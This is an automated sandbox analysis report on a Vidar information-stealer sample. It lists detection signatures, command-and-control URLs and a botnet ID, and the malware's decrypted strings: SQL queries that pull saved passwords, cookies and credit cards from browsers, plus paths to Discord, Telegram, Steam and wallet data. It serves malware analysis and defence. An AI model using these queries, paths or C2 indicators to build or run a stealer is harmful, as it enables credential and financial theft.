Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
56bDgH9sMQ.exe

Overview

General Information

Sample name:56bDgH9sMQ.exe
renamed because original name is a hash value
Original sample name:f88272ea7674d3acedd8adcf7643c598.exe
Analysis ID:1465067
MD5:f88272ea7674d3acedd8adcf7643c598
SHA1:0066fd44e2cd9293af414f735bd80456f4e3eb1d
SHA256:fad264acc346be1e63cd47611cd305cb9c894a13843119e22e87744808295387
Tags:32exetrojan
Infos:

Detection

Vidar
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Yara detected Powershell download and execute
Yara detected Vidar stealer
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Injects a PE file into a foreign processes
Machine Learning detection for sample
Sample uses string decryption to hide its real strings
Searches for specific processes (likely to inject)
Tries to harvest and steal browser information (history, passwords, etc)
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
One or more processes crash
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • 56bDgH9sMQ.exe (PID: 7736 cmdline: "C:\Users\user\Desktop\56bDgH9sMQ.exe" MD5: F88272EA7674D3ACEDD8ADCF7643C598)
    • RegAsm.exe (PID: 7760 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
    • RegAsm.exe (PID: 7768 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
    • WerFault.exe (PID: 7844 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7736 -s 324 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
VidarVidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Malware Configuration

Threatname: Vidar

{"C2 url": ["https://steamcommunity.com/profiles/76561199707802586", "https://t.me/g067n"], "Botnet": "254862acdd5c5d2dddb209d751490c15"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
    00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmpHiddenCobra_BANKSHOT_GenDetects Hidden Cobra BANKSHOT trojanFlorian Roth
    • 0x3393a:$x5: vchost.exe
    • 0x3593a:$x5: vchost.exe
    00000000.00000002.2087255940.0000000000C94000.00000004.00000001.01000000.00000003.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
      00000002.00000002.3051781987.0000000000445000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
        Process Memory Space: 56bDgH9sMQ.exe PID: 7736JoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
          Click to see the 5 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          2.2.RegAsm.exe.42e038.1.raw.unpackHiddenCobra_BANKSHOT_GenDetects Hidden Cobra BANKSHOT trojanFlorian Roth
          • 0x5902:$x5: vchost.exe
          • 0x7902:$x5: vchost.exe
          2.2.RegAsm.exe.400000.0.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
            2.2.RegAsm.exe.400000.0.raw.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
              0.2.56bDgH9sMQ.exe.c60000.0.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
                2.2.RegAsm.exe.400000.0.raw.unpackHiddenCobra_BANKSHOT_GenDetects Hidden Cobra BANKSHOT trojanFlorian Roth
                • 0x3393a:$x5: vchost.exe
                • 0x3593a:$x5: vchost.exe

                Sigma Signatures

                No Sigma rule has matched

                Snort Signatures

                No Snort rule has matched

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus / Scanner detection for submitted sample
                Source: 56bDgH9sMQ.exeAvira: detected
                Antivirus detection for URL or domain
                Source: https://steamcommunity.com/profiles/76561199707802586Avira URL Cloud: Label: malware
                Source: https://t.me/g067nAvira URL Cloud: Label: malware
                Found malware configuration
                Source: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmpMalware Configuration Extractor: Vidar {"C2 url": ["https://steamcommunity.com/profiles/76561199707802586", "https://t.me/g067n"], "Botnet": "254862acdd5c5d2dddb209d751490c15"}
                Multi AV Scanner detection for domain / URL
                Source: https://195.201.251.214:9000/Virustotal: Detection: 6%Perma Link
                Multi AV Scanner detection for submitted file
                Source: 56bDgH9sMQ.exeReversingLabs: Detection: 78%
                Source: 56bDgH9sMQ.exeVirustotal: Detection: 81%Perma Link
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: 56bDgH9sMQ.exeJoe Sandbox ML: detected
                Sample uses string decryption to hide its real strings
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: INSERT_KEY_HERE
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: GetProcAddress
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: LoadLibraryA
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: lstrcatA
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: OpenEventA
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: CreateEventA
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: CloseHandle
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: Sleep
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: GetUserDefaultLangID
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: VirtualAllocExNuma
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: VirtualFree
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: GetSystemInfo
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: VirtualAlloc
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: HeapAlloc
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: GetComputerNameA
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: lstrcpyA
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: GetProcessHeap
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: GetCurrentProcess
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: lstrlenA
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: ExitProcess
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: GlobalMemoryStatusEx
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: GetSystemTime
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: SystemTimeToFileTime
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: advapi32.dll
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: gdi32.dll
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: user32.dll
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: crypt32.dll
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: ntdll.dll
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: GetUserNameA
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: CreateDCA
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: GetDeviceCaps
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: ReleaseDC
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: CryptStringToBinaryA
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: sscanf
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: NtQueryInformationProcess
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: VMwareVMware
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: HAL9TH
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: JohnDoe
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: DISPLAY
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: %hu/%hu/%hu
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: GetEnvironmentVariableA
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: GetFileAttributesA
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: GlobalLock
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: HeapFree
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: GetFileSize
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: GlobalSize
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: CreateToolhelp32Snapshot
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: IsWow64Process
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: Process32Next
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: GetLocalTime
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: FreeLibrary
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: GetTimeZoneInformation
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: GetSystemPowerStatus
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: GetVolumeInformationA
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: GetWindowsDirectoryA
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: Process32First
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: GetLocaleInfoA
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: GetUserDefaultLocaleName
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: GetModuleFileNameA
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: DeleteFileA
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: FindNextFileA
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: LocalFree
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: FindClose
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: SetEnvironmentVariableA
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: LocalAlloc
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: GetFileSizeEx
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: ReadFile
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: SetFilePointer
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: WriteFile
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: CreateFileA
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: FindFirstFileA
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: CopyFileA
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: VirtualProtect
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: GetLogicalProcessorInformationEx
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: GetLastError
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: lstrcpynA
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: MultiByteToWideChar
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: GlobalFree
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: WideCharToMultiByte
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: GlobalAlloc
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: OpenProcess
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: TerminateProcess
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: GetCurrentProcessId
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: gdiplus.dll
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: ole32.dll
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: bcrypt.dll
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: wininet.dll
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: shlwapi.dll
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: shell32.dll
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: psapi.dll
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: rstrtmgr.dll
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: CreateCompatibleBitmap
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: SelectObject
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: BitBlt
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: DeleteObject
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: CreateCompatibleDC
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: GdipGetImageEncodersSize
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: GdipGetImageEncoders
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: GdipCreateBitmapFromHBITMAP
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: GdiplusStartup
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: GdiplusShutdown
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: GdipSaveImageToStream
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: GdipDisposeImage
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: GdipFree
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: GetHGlobalFromStream
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: CreateStreamOnHGlobal
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: CoUninitialize
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: CoInitialize
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: CoCreateInstance
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: BCryptGenerateSymmetricKey
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: BCryptCloseAlgorithmProvider
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: BCryptDecrypt
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: BCryptSetProperty
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: BCryptDestroyKey
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: BCryptOpenAlgorithmProvider
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: GetWindowRect
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: GetDesktopWindow
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: GetDC
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: CloseWindow
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: wsprintfA
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: EnumDisplayDevicesA
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: GetKeyboardLayoutList
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: CharToOemW
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: wsprintfW
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: RegQueryValueExA
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: RegEnumKeyExA
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: RegOpenKeyExA
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: RegCloseKey
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: RegEnumValueA
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: CryptBinaryToStringA
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: CryptUnprotectData
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: SHGetFolderPathA
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: ShellExecuteExA
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: InternetOpenUrlA
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: InternetConnectA
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: InternetCloseHandle
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: InternetOpenA
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: HttpSendRequestA
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: HttpOpenRequestA
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: InternetReadFile
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: InternetCrackUrlA
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: StrCmpCA
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: StrStrA
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: StrCmpCW
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: PathMatchSpecA
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: GetModuleFileNameExA
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: RmStartSession
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: RmRegisterResources
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: RmGetList
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: RmEndSession
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: sqlite3_open
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: sqlite3_prepare_v2
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: sqlite3_step
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: sqlite3_column_text
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: sqlite3_finalize
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: sqlite3_close
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: sqlite3_column_bytes
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: sqlite3_column_blob
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: encrypted_key
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: PATH
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: C:\ProgramData\nss3.dll
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: NSS_Init
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: NSS_Shutdown
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: PK11_GetInternalKeySlot
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: PK11_FreeSlot
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: PK11_Authenticate
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: PK11SDR_Decrypt
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: C:\ProgramData\
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: SELECT origin_url, username_value, password_value FROM logins
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: Soft:
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: profile:
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: Host:
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: Login:
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: Password:
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: Opera
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: OperaGX
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: Network
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: Cookies
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: .txt
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: TRUE
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: FALSE
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: Autofill
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: SELECT name, value FROM autofill
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: History
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: SELECT url FROM urls LIMIT 1000
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: SELECT name_on_card, expiration_month, expiration_year, card_number_encrypted FROM credit_cards
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: Name:
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: Month:
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: Year:
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: Card:
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: Cookies
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: Login Data
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: Web Data
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: History
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: logins.json
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: formSubmitURL
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: usernameField
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: encryptedUsername
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: encryptedPassword
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: guid
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: SELECT host, isHttpOnly, path, isSecure, expiry, name, value FROM moz_cookies
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: SELECT fieldname, value FROM moz_formhistory
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: SELECT url FROM moz_places LIMIT 1000
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: cookies.sqlite
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: formhistory.sqlite
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: places.sqlite
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: Plugins
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: Local Extension Settings
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: Sync Extension Settings
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: IndexedDB
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: Opera Stable
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: Opera GX Stable
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: CURRENT
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: chrome-extension_
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: _0.indexeddb.leveldb
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: Local State
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: profiles.ini
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: chrome
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: opera
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: firefox
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: Wallets
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: %08lX%04lX%lu
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: SOFTWARE\Microsoft\Windows NT\CurrentVersion
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: ProductName
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: %d/%d/%d %d:%d:%d
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: HARDWARE\DESCRIPTION\System\CentralProcessor\0
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: ProcessorNameString
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: DisplayName
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: DisplayVersion
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: freebl3.dll
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: mozglue.dll
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: msvcp140.dll
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: nss3.dll
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: softokn3.dll
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: vcruntime140.dll
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: \Temp\
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: .exe
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: runas
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: open
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: /c start
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: %DESKTOP%
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: %APPDATA%
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: %LOCALAPPDATA%
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: %USERPROFILE%
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: %DOCUMENTS%
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: %PROGRAMFILES%
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: %PROGRAMFILES_86%
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: %RECENT%
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: *.lnk
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: Files
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: \discord\
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: \Local Storage\leveldb\CURRENT
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: \Local Storage\leveldb
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: \Telegram Desktop\
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: key_datas
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: D877F783D5D3EF8C*
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: map*
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: A7FDF864FBC10B77*
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: A92DAA6EA6F891F2*
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: F8806DD0C461824F*
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: Telegram
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: *.tox
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: *.ini
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: Password
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: Software\Microsoft\Office\14.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: Software\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676\
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: 00000001
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: 00000002
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: 00000003
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: 00000004
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: \Outlook\accounts.txt
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: Pidgin
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: \.purple\
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: accounts.xml
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: dQw4w9WgXcQ
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: token:
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: Software\Valve\Steam
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: SteamPath
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: \config\
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: ssfn*
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: config.vdf
